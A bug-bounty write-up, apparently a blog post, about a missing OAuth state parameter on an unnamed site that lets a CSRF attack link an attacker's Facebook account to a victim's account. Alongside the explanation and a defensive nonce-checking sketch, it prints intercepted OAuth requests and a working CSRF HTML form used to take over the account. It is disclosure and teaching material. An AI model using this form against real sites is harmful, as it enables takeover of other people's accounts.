State Parameter Missing Bug - OAuth Misconfiguration
Vulnerability - Account takeover using OAuth Misconfiguration
State Parameter Importance:
Authorization protocols provide a "State" parameter that allows you to restore the previous state of your application. The state parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response.
CSRF attacks
The primary reason for using the state parameter is to mitigate CSRF attacks by using a unique and non-guessable value associated with each authentication request about to be initiated. That value allows you to prevent the attack by confirming that the value coming from the response matches the one you sent.
The state parameter is a string, so you can encode any other information in it. You send a random value when starting an authentication request and validate the received value when processing the response. You store something on the client application side (in cookies, the session, or localStorage) that allows you to perform the validation. If you receive a response with a state that doesn't match, you can infer that you may be the target of an attack, because this is either a response to an unsolicited request or someone trying to forge the response.
A CSRF attack specifically targets state-changing requests to initiate an action, rather than requests that retrieve user data, because the attacker has no way to see the response to the forged request. For the most basic cases the state parameter should be a nonce, used to correlate the request with the response received from the authentication server.
Most modern OIDC and OAuth2 SDKs, including Auth0.js in single-page applications, handle state generation and validation automatically.
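As an added illustration (not code from the original post), here is a minimal Python sketch of the nonce check described above: one handler mirrors the state-less callback shown later in the post and accepts any code, the other binds a random state to the session at link time and rejects a callback whose state does not match. The session dict, the function names and the use of the post's placeholder client_id are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

# Endpoints as they appear in the post; the client_id is the post's placeholder value.
AUTHORIZE_URL = "https://www.facebook.com/v3.1/dialog/oauth"
REDIRECT_URI = "https://redacted.com/auth/facebook/callback"
CLIENT_ID = "00000000000"


def start_link_flow(session):
    """Build the authorization URL and bind a fresh, unguessable state to this session.

    `session` stands in for the client app's server-side session (an assumption here).
    """
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": "email,public_profile",
        "state": state,
    }
    return AUTHORIZE_URL + "?" + urlencode(params)


def _query(callback_url):
    # First value of each query parameter, e.g. {"code": "...", "state": "..."}
    return {k: v[0] for k, v in parse_qs(urlparse(callback_url).query).items()}


def handle_callback_vulnerable(session, callback_url):
    """Mirrors the post's callback: any request carrying a code is accepted and
    would be linked to whichever account the browser is currently logged into."""
    return "code" in _query(callback_url)


def handle_callback_hardened(session, callback_url):
    """Accept the callback only if its state matches the nonce bound to this session."""
    q = _query(callback_url)
    expected = session.pop("oauth_state", None)  # pop: a nonce is single-use
    received = q.get("state")
    if expected is None or received is None:
        return False
    if not hmac.compare_digest(expected, received):
        return False  # unsolicited or forged response; do not exchange the code
    return "code" in q
```

A real handler would go on to exchange the code at the token endpoint only after the hardened check passes.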
Vulnerability Description
OAuth 2.0 is an authorization framework for web applications. It validates the identity of a user to the website that requested it without disclosing passwords to that website. A vulnerability in the OAuth flow leads to takeover of the victim's account.
Impact
An attacker can take over the account of the victim.
Overview:
Sorry guys, I can't disclose the name of the company, so let's call it redacted.com. Let's look at the website https://www.redacted.com. The website looks like a normal site, nothing interesting on the homepage, so I went to the Signup page and got a page like the one shown below.
I created an account using my temporary mail, completed the email confirmation and logged into my account. There is an option for linking the redacted.com account to Facebook or Google. This makes it easy to log into the redacted account using the OAuth functionality.
What is OAuth?
OAuth: OAuth stands for Open Authorization Framework and is the industry-standard delegation protocol for authorization. OAuth 2.0 is widely used by applications (e.g. SaaS platforms) to access your data that is already on the Internet. That includes, for example, your contacts list on Google, your friends list on Facebook, etc. If you were ever asked by a web or mobile application to give permission to access your personal data, you have probably used OAuth 2.0.
When I saw this option I just opened Burp Suite, clicked the Facebook icon to link my account to Facebook, and intercepted the request and response.
So the first request looks like this:
GET /v3.1/dialog/oauth?response_type=code&redirect_uri=https%3A%2F%2Fredacted.com%2Fauth%2Ffacebook%2Fcallback&scope=email%2Cpublic_profile&client_id=00000000000 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com/profile
Cookie: fr=0rqajcCy4gEh2nJvS.redactedPv2OYVcelE.AWVp7-tG; sb=OQwFXNTRCDFUcookieLIw0; datr=OQwFXBW2scookieSe4q; wd=1366XXXXX657; locale=en_GB; c_u
Connection: close
When I saw this request I felt something interesting here, because there is no state parameter, which means it may be vulnerable to a CSRF attack. Now there is a Facebook page popup for authentication. I was successfully authenticated to Facebook, then I intercepted the callback from Facebook. When I saw the callback, I wondered... there is no state parameter, which means there is no protection from a CSRF attack, so let's exploit that.
GET /auth/facebook/callback?code=AQCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.facebook.com
Cookie: __cfduid=d27690xxxxxxxxxxxxxxxxxxxxxxxxxxx471; __adroll_fpc=074645xxxxxxxxxxxxxxxxxxxxxxxx2e9; __ar_v4=JYUExxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf-cb8d-4c87–9bc1–8478a3f6ed68=session_a0xxxxxxxxxxxxxxxxxxb9e6; _fbp=fb.1.154xxxxxxxxx719436
Connection: close
When I saw this callback, I just made a CSRF HTML page called attack.html.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://redacted.com/auth/facebook/callback">
<input type="hidden" name="code" value="AxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxY" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Now we can test this vulnerability on a victim account. I created another redacted.com test account, logged into that account in another browser and went to the settings page, where there is an option for linking the Facebook account. Now I just opened the HTML page in a new tab and clicked the submit button... Yes! I got it.
My Facebook account was successfully linked with the victim's redacted.com account. For cross-checking, I logged out from the victim redacted.com account and tried to log in with my Facebook account on redacted.com... Yeah, it successfully logged in with my Facebook account, so I can take over any victim account. It's a simple OAuth misconfiguration leading to full account takeover.
Tools to use:
Generate CSRF PoC in Burp Suite.
You can use https://security.love/CSRF-PoC-Genorator/ to generate a CSRF PoC (if you don't have Burp Suite Pro).